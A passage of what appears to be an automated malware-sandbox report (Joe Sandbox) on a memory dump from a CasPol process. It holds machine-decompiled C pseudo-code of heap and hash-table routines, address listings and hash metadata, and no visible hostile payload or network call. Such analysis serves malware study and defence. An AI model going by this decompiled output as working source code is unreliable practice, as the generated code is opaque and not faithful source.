                                                                														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                														 *(_t528 - 0x78) = _t479;
                                                                														_t362 =  *(_t528 - 0x80);
                                                                														__eflags = _t362;
                                                                														if(_t362 != 0) {
                                                                															_t222 = _t362 + 4;
                                                                															 *_t222 =  *(_t362 + 4) | 1;
                                                                															__eflags =  *_t222;
                                                                														}
                                                                													}
                                                                													__eflags =  *(_t528 - 0xb0);
                                                                													if( *(_t528 - 0xb0) != 0) {
                                                                														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                														_t458 = 0xb;
                                                                														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                                														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                                														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                                														E0166FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                                														_t529 = _t529 + 0xc;
                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                                														 *(_t528 - 0x78) = _t479;
                                                                														__eflags = _t505;
                                                                														if(_t505 != 0) {
                                                                															_t241 = _t505 + 4;
                                                                															 *_t241 =  *(_t505 + 4) | 1;
                                                                															__eflags =  *_t241;
                                                                														}
                                                                													}
                                                                													_t328 =  *(_t528 + 0x1c);
                                                                													__eflags = _t328;
                                                                													if(_t328 == 0) {
                                                                														L87:
                                                                														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                                														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                                														_t455 =  *(_t528 - 0xdc);
                                                                														 *(_t427 + 0x14) = _t455;
                                                                														_t480 =  *(_t528 - 0xa0);
                                                                														_t517 = 3;
                                                                														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                                														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                                															asm("rdtsc");
                                                                															 *(_t427 + 0x3c) = _t480;
                                                                														} else {
                                                                															 *(_t427 + 0x3c) = _t455;
                                                                														}
                                                                														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                                														_t456 =  *[fs:0x18];
                                                                														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                                														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                                														_t427 = 0;
                                                                														__eflags = 0;
                                                                														_t511 = 0x18;
                                                                														goto L91;
                                                                													} else {
                                                                														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                                														__eflags = _t519;
                                                                														 *(_t528 - 0x8c) = _t328;
                                                                														do {
                                                                															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                                															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                                															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                                															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                                															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                                															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                                																_t334 =  *_t519;
                                                                															} else {
                                                                																_t334 = 0;
                                                                															}
                                                                															_t336 = _t334 & 0x000000ff;
                                                                															__eflags = _t336;
                                                                															_t427 =  *(_t528 - 0x88);
                                                                															if(_t336 == 0) {
                                                                																_t481 = _t479 + _t506;
                                                                																__eflags = _t481;
                                                                																 *(_t528 - 0x78) = _t481;
                                                                																E0166F3E0(_t479 + _t427, _t457, _t506);
                                                                																_t529 = _t529 + 0xc;
                                                                															} else {
                                                                																_t340 = _t336 - 1;
                                                                																__eflags = _t340;
                                                                																if(_t340 == 0) {
                                                                																	E0166F3E0( *(_t528 - 0xb8), _t457, _t506);
                                                                																	_t529 = _t529 + 0xc;
                                                                																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                                																} else {
                                                                																	__eflags = _t340 == 0;
                                                                																	if(_t340 == 0) {
                                                                																		__eflags = _t506 - 8;
                                                                																		if(_t506 == 8) {
                                                                																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                                																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                                																		}
                                                                																	}
                                                                																}
                                                                															}
                                                                															_t339 = 0x10;
                                                                															_t519 = _t519 + _t339;
                                                                															_t263 = _t528 - 0x8c;
                                                                															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                                															__eflags =  *_t263;
                                                                															_t479 =  *(_t528 - 0x78);
                                                                														} while ( *_t263 != 0);
                                                                														goto L87;
                                                                													}
                                                                												}
                                                                											} else {
                                                                												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                                												 *(_t528 - 0xa2) = _t392;
                                                                												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                                												__eflags = _t469;
                                                                												while(1) {
                                                                													 *(_t528 - 0xe4) = _t511;
                                                                													__eflags = _t392;
                                                                													_t393 = _t427;
                                                                													if(_t392 != 0) {
                                                                														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                                													}
                                                                													_t395 = (_t393 & 0x000000ff) - _t427;
                                                                													__eflags = _t395;
                                                                													if(_t395 == 0) {
                                                                														_t511 = _t511 +  *_t469;
                                                                														__eflags = _t511;
                                                                													} else {
                                                                														_t398 = _t395 - 1;
                                                                														__eflags = _t398;
                                                                														if(_t398 == 0) {
                                                                															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                														} else {
                                                                															__eflags = _t398 == 1;
                                                                															if(_t398 == 1) {
                                                                																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                																_t402 =  *_t469 & 0x0000ffff;
                                                                																 *(_t528 - 0xac) = _t402;
                                                                																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                															}
                                                                														}
                                                                													}
                                                                													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                													if(_t511 <  *(_t528 - 0xe4)) {
                                                                														break;
                                                                													}
                                                                													_t397 =  *(_t528 - 0x88) + 1;
                                                                													 *(_t528 - 0x88) = _t397;
                                                                													_t469 = _t469 + 0x10;
                                                                													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                													_t392 =  *(_t528 - 0xa2);
                                                                													if(_t397 <  *(_t528 + 0x1c)) {
                                                                														continue;
                                                                													}
                                                                													goto L45;
                                                                												}
                                                                												_t475 = 0x216;
                                                                												 *(_t528 - 0x74) = 0x216;
                                                                												goto L45;
                                                                											}
                                                                										} else {
                                                                											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                											goto L16;
                                                                										}
                                                                									}
                                                                									_t491 = E016F4CAB(_t306, _t528 - 0xa4);
                                                                									 *(_t528 - 0x74) = _t491;
                                                                									__eflags = _t491;
                                                                									if(_t491 != 0) {
                                                                										goto L91;
                                                                									} else {
                                                                										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                										goto L20;
                                                                									}
                                                                								}
                                                                								L16:
                                                                								 *(_t528 - 0x74) = 0x1069;
                                                                								L93:
                                                                								_t298 =  *(_t528 - 0xd0) + 1;
                                                                								 *(_t528 - 0xd0) = _t298;
                                                                								_t474 = _t474 + _t511;
                                                                								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                								_t494 = 4;
                                                                								__eflags = _t298 - _t494;
                                                                								if(_t298 >= _t494) {
                                                                									goto L100;
                                                                								}
                                                                								_t494 =  *(_t528 - 0xcc);
                                                                								_t435 = _t298;
                                                                								continue;
                                                                							}
                                                                							__eflags = _t494[2] | _t494[3];
                                                                							if((_t494[2] | _t494[3]) == 0) {
                                                                								goto L15;
                                                                							}
                                                                							goto L12;
                                                                						}
                                                                						__eflags = _t301;
                                                                						if(_t301 != 0) {
                                                                							goto L92;
                                                                						}
                                                                						goto L10;
                                                                						L92:
                                                                						goto L93;
                                                                					}
                                                                				} else {
                                                                					_push(0x57);
                                                                					L101:
                                                                					return E0167D130(_t427, _t494, _t511);
                                                                				}
                                                                			}










































































                                                                0x00000000
                                                                0x00000000
                                                                0x016f5d16
                                                                0x016f5d1a
                                                                0x00000000
                                                                0x00000000
                                                                0x016f5d20
                                                                0x016f5d22
                                                                0x016f5d25
                                                                0x016f5d2f
                                                                0x016f5d2f
                                                                0x016f5d33
                                                                0x016f5d3d
                                                                0x016f5d49
                                                                0x016f5d4b
                                                                0x00000000
                                                                0x00000000
                                                                0x016f5d5a
                                                                0x016f5d5d
                                                                0x016f5d60
                                                                0x00000000
                                                                0x00000000
                                                                0x016f5d66
                                                                0x016f5d69
                                                                0x00000000
                                                                0x00000000
                                                                0x016f5d6f
                                                                0x016f5d6f
                                                                0x016f5d73
                                                                0x016f5d79
                                                                0x016f5d7f
                                                                0x016f5d86
                                                                0x016f5d95
                                                                0x016f5d98
                                                                0x016f5dba
                                                                0x016f5dcb
                                                                0x016f5dce
                                                                0x016f5dd3
                                                                0x016f5dd6
                                                                0x016f5dd8
                                                                0x016f5de6
                                                                0x016f5dec
                                                                0x016f5dee
                                                                0x016f5df1
                                                                0x016f5df3
                                                                0x016f635a
                                                                0x016f635a
                                                                0x00000000
                                                                0x016f635a
                                                                0x016f5dfe
                                                                0x016f5e02
                                                                0x016f5e05
                                                                0x016f5e07
                                                                0x016f5e10
                                                                0x016f5e13
                                                                0x016f5e1b
                                                                0x016f5e1c
                                                                0x016f5e21
                                                                0x016f5e22
                                                                0x016f5e23
                                                                0x016f5e25
                                                                0x016f5e2a
                                                                0x016f5e2c
                                                                0x016f5e2e
                                                                0x016f5e36
                                                                0x016f5e39
                                                                0x016f5e42
                                                                0x016f5e47
                                                                0x016f5e4d
                                                                0x016f5e54
                                                                0x016f5e54
                                                                0x016f5e54
                                                                0x016f5e2e
                                                                0x016f5e5c
                                                                0x016f5e5f
                                                                0x016f5e62
                                                                0x016f5e64
                                                                0x016f5e6b
                                                                0x016f5e70
                                                                0x016f5e7a
                                                                0x016f5e7a
                                                                0x016f5e7a
                                                                0x016f5e6b
                                                                0x016f5e7e
                                                                0x016f5e7f
                                                                0x016f5e7f
                                                                0x016f5e81
                                                                0x016f5e87
                                                                0x016f5e8b
                                                                0x016f5e8c
                                                                0x016f5e8c
                                                                0x016f5e8c
                                                                0x016f5e9a
                                                                0x016f5e9c
                                                                0x016f5ea2
                                                                0x016f5ea6
                                                                0x016f5f50
                                                                0x016f5f50
                                                                0x016f5f57
                                                                0x016f5f66
                                                                0x016f5f66
                                                                0x016f5f66
                                                                0x016f5f68
                                                                0x016f5f6a
                                                                0x016f63d0
                                                                0x00000000
                                                                0x016f5f70
                                                                0x016f5f70
                                                                0x016f5f91
                                                                0x016f5f9c
                                                                0x016f5f9e
                                                                0x016f5fa4
                                                                0x016f5fa6
                                                                0x016f638c
                                                                0x016f6392
                                                                0x016f63a1
                                                                0x016f63a7
                                                                0x016f63af
                                                                0x016f63af
                                                                0x016f63bd
                                                                0x016f63d8
                                                                0x00000000
                                                                0x016f63d8
                                                                0x016f5fac
                                                                0x016f5fb2
                                                                0x016f5fb4
                                                                0x016f5fbd
                                                                0x016f5fc6
                                                                0x016f5fce
                                                                0x016f5fd4
                                                                0x016f5fdc
                                                                0x016f5fec
                                                                0x016f5fed
                                                                0x016f5fee
                                                                0x016f5fef
                                                                0x016f5ff9
                                                                0x016f5ffa
                                                                0x016f5ffb
                                                                0x016f5ffc
                                                                0x016f6000
                                                                0x016f6004
                                                                0x016f6012
                                                                0x016f6012
                                                                0x016f6018
                                                                0x016f6019
                                                                0x016f601a
                                                                0x016f601b
                                                                0x016f601c
                                                                0x016f6020
                                                                0x016f6059
                                                                0x016f605c
                                                                0x016f6061
                                                                0x016f6061
                                                                0x016f6022
                                                                0x016f6022
                                                                0x016f6022
                                                                0x016f6025
                                                                0x016f602a
                                                                0x016f602b
                                                                0x016f6031
                                                                0x016f6037
                                                                0x016f6038
                                                                0x016f603e
                                                                0x016f6048
                                                                0x016f6049
                                                                0x016f604a
                                                                0x016f604b
                                                                0x016f604c
                                                                0x016f604d
                                                                0x016f6053
                                                                0x016f6054
                                                                0x016f6054
                                                                0x016f6062
                                                                0x016f6065
                                                                0x016f6067
                                                                0x016f606a
                                                                0x016f6070
                                                                0x016f6075
                                                                0x016f6076
                                                                0x016f6081
                                                                0x016f6087
                                                                0x016f6095
                                                                0x016f6099
                                                                0x016f609e
                                                                0x016f60a4
                                                                0x016f60ae
                                                                0x016f60b0
                                                                0x016f60b3
                                                                0x016f60b6
                                                                0x016f60b8
                                                                0x016f60ba
                                                                0x016f60ba
                                                                0x016f60ba
                                                                0x016f60ba
                                                                0x016f60be
                                                                0x016f60c0
                                                                0x016f60c5
                                                                0x016f60c5
                                                                0x016f60c5
                                                                0x016f60c6
                                                                0x016f60cd
                                                                0x016f6114
                                                                0x016f60cf
                                                                0x016f60cf
                                                                0x016f60d4
                                                                0x016f60d5
                                                                0x016f60da
                                                                0x016f60db
                                                                0x016f60e1
                                                                0x016f60e2
                                                                0x016f60e8
                                                                0x016f60f8
                                                                0x016f60fd
                                                                0x016f60fe
                                                                0x016f6102
                                                                0x016f6104
                                                                0x016f6107
                                                                0x016f6109
                                                                0x016f610b
                                                                0x016f610b
                                                                0x016f610b
                                                                0x016f610b
                                                                0x016f610f
                                                                0x016f610f
                                                                0x016f6117
                                                                0x016f611a
                                                                0x016f611f
                                                                0x016f6125
                                                                0x016f6134
                                                                0x016f6139
                                                                0x016f613f
                                                                0x016f6146
                                                                0x016f6148
                                                                0x016f614b
                                                                0x016f614d
                                                                0x016f614f
                                                                0x016f614f
                                                                0x016f614f
                                                                0x016f614f
                                                                0x016f6153
                                                                0x016f6159
                                                                0x016f6159
                                                                0x016f615c
                                                                0x016f6163
                                                                0x016f6169
                                                                0x016f616c
                                                                0x016f6172
                                                                0x016f6181
                                                                0x016f6186
                                                                0x016f6187
                                                                0x016f618b
                                                                0x016f6191
                                                                0x016f6195
                                                                0x016f61a3
                                                                0x016f61bb
                                                                0x016f61c0
                                                                0x016f61c3
                                                                0x016f61cc
                                                                0x016f61d0
                                                                0x016f61dc
                                                                0x016f61de
                                                                0x016f61e1
                                                                0x016f61e4
                                                                0x016f61e6
                                                                0x016f61e8
                                                                0x016f61e8
                                                                0x016f61e8
                                                                0x016f61e8
                                                                0x016f61e6
                                                                0x016f61ec
                                                                0x016f61f3
                                                                0x016f6203
                                                                0x016f6209
                                                                0x016f620a
                                                                0x016f6216
                                                                0x016f621d
                                                                0x016f6227
                                                                0x016f6241
                                                                0x016f6246
                                                                0x016f624c
                                                                0x016f6257
                                                                0x016f6259
                                                                0x016f625c
                                                                0x016f625e
                                                                0x016f6260
                                                                0x016f6260
                                                                0x016f6260
                                                                0x016f6260
                                                                0x016f625e
                                                                0x016f6264
                                                                0x016f6267
                                                                0x016f6269
                                                                0x016f6315
                                                                0x016f6315
                                                                0x016f631b
                                                                0x016f631e
                                                                0x016f6324
                                                                0x016f6327
                                                                0x016f632f
                                                                0x016f6330
                                                                0x016f6333
                                                                0x016f633a
                                                                0x016f633c
                                                                0x016f6335
                                                                0x016f6335
                                                                0x016f6335
                                                                0x016f633f
                                                                0x016f6342
                                                                0x016f634c
                                                                0x016f6352
                                                                0x016f6355
                                                                0x016f6355
                                                                0x016f6359
                                                                0x00000000
                                                                0x016f626f
                                                                0x016f6275
                                                                0x016f6275
                                                                0x016f6278
                                                                0x016f627e
                                                                0x016f627e
                                                                0x016f6281
                                                                0x016f6287
                                                                0x016f628d
                                                                0x016f6298
                                                                0x016f629c
                                                                0x016f62a2
                                                                0x016f629e
                                                                0x016f629e
                                                                0x016f629e
                                                                0x016f62a7
                                                                0x016f62a7
                                                                0x016f62aa
                                                                0x016f62b0
                                                                0x016f62f0
                                                                0x016f62f0
                                                                0x016f62f2
                                                                0x016f62f8
                                                                0x016f62fd
                                                                0x016f62b2
                                                                0x016f62b2
                                                                0x016f62b2
                                                                0x016f62b5
                                                                0x016f62dd
                                                                0x016f62e2
                                                                0x016f62e5
                                                                0x016f62b7
                                                                0x016f62b8
                                                                0x016f62bb
                                                                0x016f62bd
                                                                0x016f62c0
                                                                0x016f62c4
                                                                0x016f62cd
                                                                0x016f62cd
                                                                0x016f62c0
                                                                0x016f62bb
                                                                0x016f62b5
                                                                0x016f6302
                                                                0x016f6303
                                                                0x016f6305
                                                                0x016f6305
                                                                0x016f6305
                                                                0x016f630c
                                                                0x016f630c
                                                                0x00000000
                                                                0x016f627e
                                                                0x016f6269
                                                                0x016f5eac
                                                                0x016f5ebb
                                                                0x016f5ebe
                                                                0x016f5ecb
                                                                0x016f5ecb
                                                                0x016f5ece
                                                                0x016f5ece
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1ae6dfbf014f66fb8614edc15360fd5777dfe8f504042597d0813a5fb51eacaa
                                                                • Instruction ID: 6580b97a50c3ced4978322007b87620b9cb4deddf92c832d8b3ddf744d38607d
                                                                • Opcode Fuzzy Hash: 1ae6dfbf014f66fb8614edc15360fd5777dfe8f504042597d0813a5fb51eacaa
                                                                • Instruction Fuzzy Hash: FA4237759002298FDB24CF68CC80BA9BBB1FF49304F1581AEDA4DAB342D7759A85CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 50%
                                                                			E016FE824(signed int __ecx, signed int* __edx) {
                                                                				signed int _v8;
                                                                				signed char _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				signed int _v36;
                                                                				signed int _v40;
                                                                				unsigned int _v44;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed int _t177;
                                                                				signed int _t179;
                                                                				unsigned int _t202;
                                                                				signed char _t207;
                                                                				signed char _t210;
                                                                				signed int _t230;
                                                                				void* _t244;
                                                                				unsigned int _t247;
                                                                				signed int _t288;
                                                                				signed int _t289;
                                                                				signed int _t291;
                                                                				signed char _t293;
                                                                				signed char _t295;
                                                                				signed char _t298;
                                                                				intOrPtr* _t303;
                                                                				signed int _t310;
                                                                				signed char _t316;
                                                                				signed int _t319;
                                                                				signed char _t323;
                                                                				signed char _t330;
                                                                				signed int _t334;
                                                                				signed int _t337;
                                                                				signed int _t341;
                                                                				signed char _t345;
                                                                				signed char _t347;
                                                                				signed int _t353;
                                                                				signed char _t354;
                                                                				void* _t383;
                                                                				signed char _t385;
                                                                				signed char _t386;
                                                                				unsigned int _t392;
                                                                				signed int _t393;
                                                                				signed int _t395;
                                                                				signed int _t398;
                                                                				signed int _t399;
                                                                				signed int _t401;
                                                                				unsigned int _t403;
                                                                				void* _t404;
                                                                				unsigned int _t405;
                                                                				signed int _t406;
                                                                				signed char _t412;
                                                                				unsigned int _t413;
                                                                				unsigned int _t418;
                                                                				void* _t419;
                                                                				void* _t420;
                                                                				void* _t421;
                                                                				void* _t422;
                                                                				void* _t423;
                                                                				signed char* _t425;
                                                                				signed int _t426;
                                                                				signed int _t428;
                                                                				unsigned int _t430;
                                                                				signed int _t431;
                                                                				signed int _t433;
                                                                
                                                                				_v8 =  *0x171d360 ^ _t433;
                                                                				_v40 = __ecx;
                                                                				_v16 = __edx;
                                                                				_t289 = 0x4cb2f;
                                                                				_t425 = __edx[1];
                                                                				_t403 =  *__edx << 2;
                                                                				if(_t403 < 8) {
                                                                					L3:
                                                                					_t404 = _t403 - 1;
                                                                					if(_t404 == 0) {
                                                                						L16:
                                                                						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                                                                						L17:
                                                                						_t426 = _v40;
                                                                						_v20 = _t426 + 0x1c;
                                                                						_t177 = L0164FAD0(_t426 + 0x1c);
                                                                						_t385 = 0;
                                                                						while(1) {
                                                                							L18:
                                                                							_t405 =  *(_t426 + 4);
                                                                							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
                                                                							_t316 = _t289 & _t179;
                                                                							_v24 = _t179;
                                                                							_v32 = _t316;
                                                                							_v12 = _t316 >> 0x18;
                                                                							_v36 = _t316 >> 0x10;
                                                                							_v28 = _t316 >> 8;
                                                                							if(_t385 != 0) {
                                                                								goto L21;
                                                                							}
                                                                							_t418 = _t405 >> 5;
                                                                							if(_t418 == 0) {
                                                                								_t406 = 0;
                                                                								L31:
                                                                								if(_t406 == 0) {
                                                                									L35:
                                                                									E0164FA00(_t289, _t316, _t406, _t426 + 0x1c);
                                                                									 *0x171b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
                                                                									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
                                                                									_v36 = _t319;
                                                                									if(_t319 != 0) {
                                                                										asm("stosd");
                                                                										asm("stosd");
                                                                										asm("stosd");
                                                                										_t408 = _v16;
                                                                										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
                                                                										 *((char*)(_t319 + 0xb)) =  *_v16;
                                                                										 *(_t319 + 4) = _t289;
                                                                										_t53 = _t319 + 0xc; // 0xc
                                                                										E01642280(E0166F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
                                                                										_t428 = _v40;
                                                                										_t386 = 0;
                                                                										while(1) {
                                                                											L38:
                                                                											_t202 =  *(_t428 + 4);
                                                                											_v16 = _v16 | 0xffffffff;
                                                                											_v16 = _v16 << (_t202 & 0x0000001f);
                                                                											_t323 = _v16 & _t289;
                                                                											_v20 = _t323;
                                                                											_v20 = _v20 >> 0x18;
                                                                											_v28 = _t323;
                                                                											_v28 = _v28 >> 0x10;
                                                                											_v12 = _t323;
                                                                											_v12 = _v12 >> 8;
                                                                											_v32 = _t323;
                                                                											if(_t386 != 0) {
                                                                												goto L41;
                                                                											}
                                                                											_t247 = _t202 >> 5;
                                                                											_v24 = _t247;
                                                                											if(_t247 == 0) {
                                                                												_t412 = 0;
                                                                												L50:
                                                                												if(_t412 == 0) {
                                                                													L53:
                                                                													_t291 =  *(_t428 + 4);
                                                                													_v28 =  *((intOrPtr*)(_t428 + 0x28));
                                                                													_v44 =  *(_t428 + 0x24);
                                                                													_v32 =  *((intOrPtr*)(_t428 + 0x20));
                                                                													_t207 = _t291 >> 5;
                                                                													if( *_t428 < _t207 + _t207) {
                                                                														L74:
                                                                														_t430 = _t291 >> 5;
                                                                														_t293 = _v36;
                                                                														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
                                                                														_v44 = _t210;
                                                                														_t159 = _t430 - 1; // 0xffffffdf
                                                                														_t428 = _v40;
                                                                														_t330 =  *(_t428 + 8);
                                                                														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                                                														_t412 = _t293;
                                                                														 *_t293 =  *(_t330 + _t386 * 4);
                                                                														 *(_t330 + _t386 * 4) = _t293;
                                                                														 *_t428 =  *_t428 + 1;
                                                                														_t289 = 0;
                                                                														L75:
                                                                														E0163FFB0(_t289, _t412, _t428 + 0x1c);
                                                                														if(_t289 != 0) {
                                                                															_t428 =  *(_t428 + 0x24);
                                                                															 *0x171b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
                                                                															 *_t428();
                                                                														}
                                                                														L77:
                                                                														return E0166B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
                                                                													}
                                                                													_t334 = 2;
                                                                													_t207 = E0165F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
                                                                													if(_t207 < 0) {
                                                                														goto L74;
                                                                													}
                                                                													_t413 = _v24;
                                                                													if(_t413 < 4) {
                                                                														_t413 = 4;
                                                                													}
                                                                													 *0x171b1e0(_t413 << 2, _v28);
                                                                													_t207 =  *_v32();
                                                                													_t386 = _t207;
                                                                													_v16 = _t386;
                                                                													if(_t386 == 0) {
                                                                														_t291 =  *(_t428 + 4);
                                                                														if(_t291 >= 0x20) {
                                                                															goto L74;
                                                                														}
                                                                														_t289 = _v36;
                                                                														_t412 = 0;
                                                                														goto L75;
                                                                													} else {
                                                                														_t108 = _t413 - 1; // 0x3
                                                                														_t337 = _t108;
                                                                														if((_t413 & _t337) == 0) {
                                                                															L62:
                                                                															if(_t413 > 0x4000000) {
                                                                																_t413 = 0x4000000;
                                                                															}
                                                                															_t295 = _t386;
                                                                															_v24 = _v24 & 0x00000000;
                                                                															_t392 = _t413 << 2;
                                                                															_t230 = _t428 | 0x00000001;
                                                                															_t393 = _t392 >> 2;
                                                                															asm("sbb ecx, ecx");
                                                                															_t341 =  !(_v16 + _t392) & _t393;
                                                                															if(_t341 <= 0) {
                                                                																L67:
                                                                																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
                                                                																_v32 = _t395;
                                                                																_v20 = 0;
                                                                																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
                                                                																	L72:
                                                                																	_t345 =  *(_t428 + 8);
                                                                																	_t207 = _v16;
                                                                																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
                                                                																	 *(_t428 + 8) = _t207;
                                                                																	 *(_t428 + 4) = _t291;
                                                                																	if(_t345 != 0) {
                                                                																		 *0x171b1e0(_t345, _v28);
                                                                																		_t207 =  *_v44();
                                                                																		_t291 =  *(_t428 + 4);
                                                                																	}
                                                                																	goto L74;
                                                                																} else {
                                                                																	goto L68;
                                                                																}
                                                                																do {
                                                                																	L68:
                                                                																	_t298 =  *(_t428 + 8);
                                                                																	_t431 = _v20;
                                                                																	_v12 = _t298;
                                                                																	while(1) {
                                                                																		_t347 =  *(_t298 + _t431 * 4);
                                                                																		_v24 = _t347;
                                                                																		if((_t347 & 0x00000001) != 0) {
                                                                																			goto L71;
                                                                																		}
                                                                																		 *(_t298 + _t431 * 4) =  *_t347;
                                                                																		_t300 =  *(_t347 + 4) & _t395;
                                                                																		_t398 = _v16;
                                                                																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                                                																		_t303 = _v24;
                                                                																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
                                                                																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
                                                                																		_t395 = _v32;
                                                                																		_t298 = _v12;
                                                                																	}
                                                                																	L71:
                                                                																	_v20 = _t431 + 1;
                                                                																	_t428 = _v40;
                                                                																} while (_v20 <  *(_t428 + 4) >> 5);
                                                                																goto L72;
                                                                															} else {
                                                                																_t399 = _v24;
                                                                																do {
                                                                																	_t399 = _t399 + 1;
                                                                																	 *_t295 = _t230;
                                                                																	_t295 = _t295 + 4;
                                                                																} while (_t399 < _t341);
                                                                																goto L67;
                                                                															}
                                                                														}
                                                                														_t354 = _t337 | 0xffffffff;
                                                                														if(_t413 == 0) {
                                                                															L61:
                                                                															_t413 = 1 << _t354;
                                                                															goto L62;
                                                                														} else {
                                                                															goto L60;
                                                                														}
                                                                														do {
                                                                															L60:
                                                                															_t354 = _t354 + 1;
                                                                															_t413 = _t413 >> 1;
                                                                														} while (_t413 != 0);
                                                                														goto L61;
                                                                													}
                                                                												}
                                                                												_t89 = _t412 + 8; // 0x8
                                                                												_t244 = E016FE7A8(_t89);
                                                                												_t289 = _v36;
                                                                												if(_t244 == 0) {
                                                                													_t412 = 0;
                                                                												}
                                                                												goto L75;
                                                                											}
                                                                											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
                                                                											_t323 = _v32;
                                                                											while(1) {
                                                                												L41:
                                                                												_t386 =  *_t386;
                                                                												_v12 = _t386;
                                                                												if((_t386 & 0x00000001) != 0) {
                                                                													break;
                                                                												}
                                                                												if(_t323 == ( *(_t386 + 4) & _v16)) {
                                                                													L45:
                                                                													if(_t386 == 0) {
                                                                														goto L53;
                                                                													}
                                                                													if(E016FE7EB(_t386, _t408) != 0) {
                                                                														_t412 = _v12;
                                                                														goto L50;
                                                                													}
                                                                													_t386 = _v12;
                                                                													goto L38;
                                                                												}
                                                                											}
                                                                											_t386 = 0;
                                                                											_v12 = 0;
                                                                											goto L45;
                                                                										}
                                                                									}
                                                                									_t412 = 0;
                                                                									goto L77;
                                                                								}
                                                                								_t38 = _t406 + 8; // 0x8
                                                                								_t364 = _t38;
                                                                								if(E016FE7A8(_t38) == 0) {
                                                                									_t406 = 0;
                                                                								}
                                                                								E0164FA00(_t289, _t364, _t406, _v20);
                                                                								goto L77;
                                                                							}
                                                                							_t24 = _t418 - 1; // -1
